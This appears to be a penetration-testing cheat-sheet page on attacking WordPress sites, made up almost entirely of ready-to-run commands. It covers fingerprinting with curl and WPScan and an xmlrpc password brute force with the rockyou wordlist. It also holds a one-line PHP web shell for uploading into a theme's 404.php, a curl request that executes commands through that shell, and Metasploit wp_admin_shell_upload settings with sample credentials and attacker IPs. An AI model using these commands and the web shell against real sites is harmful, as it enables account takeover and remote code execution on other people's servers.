Wordpress

Manual Enumeration

# Confirm that it is a wordpress site
curl -s <http://blog.sitet.local> | grep WordPress

# Check installede themes
curl -s <http://blog.site.local/> | grep themes

# Check for plugins installed
curl -s <http://blog.site.local/> | grep plugins

WPScan

# Normal Scan 
sudo wpscan --url <http://blog.site.local> --enumerate --api-token dEOFB<SNIP>

# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>

Attacking Wordpress

# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>

Code Execution

# PHP web shell to upload on site
system($_GET[0]);

# using curl to execute commands
curl <http://site.local/wp-content/themes/twentynineteen/404.php?0=id>

# wp_admin_shell_upload can be used to upload a shell and execute it automatically
use exploit/unix/webapp/wp_admin_shell_upload
> set rhosts site.local
> set username john
> set password firebird1
> set lhost 10.10.14.15 
> set rhost 10.129.42.195  
> set VHOST blog.site.local

PreviousCMS (Content Management System)NextJoomla

Last updated 2 years ago

Manual Enumeration

WPScan

Attacking Wordpress

Login Bruteforce

Code Execution